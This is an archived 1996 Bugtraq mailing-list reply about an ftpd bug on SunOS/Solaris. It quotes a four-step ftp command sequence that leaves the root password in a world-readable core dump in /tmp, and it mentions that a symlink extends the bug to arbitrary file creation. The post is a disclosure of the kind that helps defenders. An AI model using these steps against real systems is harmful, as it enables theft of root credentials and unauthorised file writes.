[3478] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Re: ftpd bug? Was: bin/1805: Bug in ftpd

daemon@ATHENA.MIT.EDU (Micah Brandon)
Wed Oct 16 13:59:35 1996

Date: 	Wed, 16 Oct 1996 03:22:28 -0400
Reply-To: Micah Brandon <brandon@eniac.vv.com>
From: Micah Brandon <brandon@eniac.vv.com>
X-To:         Martin.Rex@sap-ag.de
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@NETSPACE.ORG>
In-Reply-To:  <199610152314.AA21264@sap-ag.de> from "Martin Rex" at Oct 15,
              96 06:14:08 pm

> SunOS 5.5:
>
> logon via ftp with your regular user/password,
> ftp> cd /tmp
> ftp> user root wrongpasswd
> ftp> quote pasv
>
> voila, root password in world readable core dump under /tmp
>
        I was able to create this core file under Solaris 2.4 as well...and
if I took the time to create a symbolic link before doing the above
procedure, I was able to create files anywhere on the system :(

micah


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[3478] in bugtraq

Re: ftpd bug? Was: bin/1805: Bug in ftpd

daemon@ATHENA.MIT.EDU (Micah Brandon)Wed Oct 16 13:59:35 1996

daemon@ATHENA.MIT.EDU (Micah Brandon)
Wed Oct 16 13:59:35 1996